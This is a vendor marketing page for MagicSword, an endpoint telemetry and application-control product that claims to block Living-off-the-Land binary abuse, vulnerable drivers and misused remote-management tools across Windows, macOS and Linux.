Use Case

Know What's Running

Execution Visibility That Drives Prevention

84% of high-severity breaches involve Living off the Land techniques — attacks that use legitimate, signed tools already present on the endpoint. EDR alone struggles to distinguish trusted administrative activity from malicious use of the same binaries. MagicSword closes that gap with deep endpoint telemetry and threat-driven execution control across Windows, macOS, and Linux.

Cross-Platform Endpoint Telemetry

Lightweight agents collect process execution data, software inventory, and browser extension details continuously across your fleet. Every execution event includes the context security teams need to assess risk and build policy.

  • Process execution with parent-child process chains and command line capture
  • Software inventory including Win32 applications and Microsoft Store apps
  • Browser extension inventory across Chrome, Edge, and Firefox
  • Windows event log collection including code integrity and enforcement events
  • File hash, publisher, and certificate verification per execution

Telemetry updates continuously via agent heartbeat.

A

Data collected per process:

1Execution count and unique user count
2Endpoints where the process has run
3First seen and last seen timestamps
4Command line samples with abuse pattern flagging
5Parent process chain reconstruction
B

Platforms supported:

Windows — full process telemetry, software inventory, WDAC enforcement events
macOS — endpoint management and browser extension inventory
Linux — endpoint management and browser extension inventory

Closing the EDR Trust Gap

EDR excels at detection and response but faces a fundamental challenge: verifying the intent of trusted, signed tools. Over 200 legitimate Windows binaries are commonly abused by attackers, 505+ known vulnerable drivers can bypass security controls entirely, and 284 documented RMM tools are routinely weaponized. MagicSword adds the prevention layer EDR cannot — cross-referencing every execution against continuously updated threat intelligence to block documented abuse patterns before damage occurs.

A

Autonomous threat investigation:

1Timeline analysis with execution context around suspicious activity
2Cross-endpoint correlation and fleet-wide spread analysis
3Command line abuse pattern detection — encoded commands, download cradles, policy bypass attempts
4MITRE ATT&CK technique mapping for every finding
B

This enables:

Immediate blocklisting of abused RMM tools across 284 tracked tools
Proactive BYOVD protection against 505+ known vulnerable drivers
Signed binary abuse defense across 200+ commonly abused Windows binaries
Continuous malware-free attack prevention powered by LOLBAS, LOLDrivers, and LOLRMM research
Direct conversion of findings into WDAC policy rules

Per Role. Per Endpoint. Without Guesswork.

MagicSword allows organizations to control what can run based on group, role, and endpoint. Security teams get a clear view of execution patterns and the tools to act on them.

  • See what is allowed, blocked, and audited per endpoint
  • Identify risky execution pathways through parent-child process chains
  • Enforce policies aligned to real usage patterns across the fleet
  • Track software inventory and version distribution across all endpoints
  • Reduce unnecessary exposure with measurable endpoint attack surface reduction

The Trust Gap

EDR detects and responds. Application control prevents and enforces. Together they create defense in depth — stopping attacks at multiple independent chokepoints before they escalate.

The EDR Trust Gap — EDR struggles to verify intent of trusted tools while Application Control provides prevention and policy enforcement

The Outcome

With deep endpoint telemetry and execution visibility, organizations gain:

  • Process-level visibility into every execution across the fleet
  • Practical Zero Trust endpoint security grounded in real data
  • Prevention of malware-free attacks that bypass EDR detection
  • Reduced false positives through execution context and threat correlation
  • Lower incident response workload with autonomous threat investigation
  • Cross-platform endpoint coverage across Windows, macOS, and Linux

Visibility informs decisions. Execution control enforces them.

Related Frameworks

NIST SP 800-53

AU-2 Audit & Accountability

CIS Controls v8

Software asset inventory

SOC 2 Type II

Monitoring and audit logging

Relevant Industries

Manufacturing & High Tech

Production and IP protection

Energy & Utilities

Critical infrastructure protection

Government & Public Sector

Federal, defense, and state cybersecurity

Ready to Strengthen Your Security Posture?

Deploy threat-driven application control in minutes. No specialized engineers required.

SIGN UP FREEBOOK A DEMO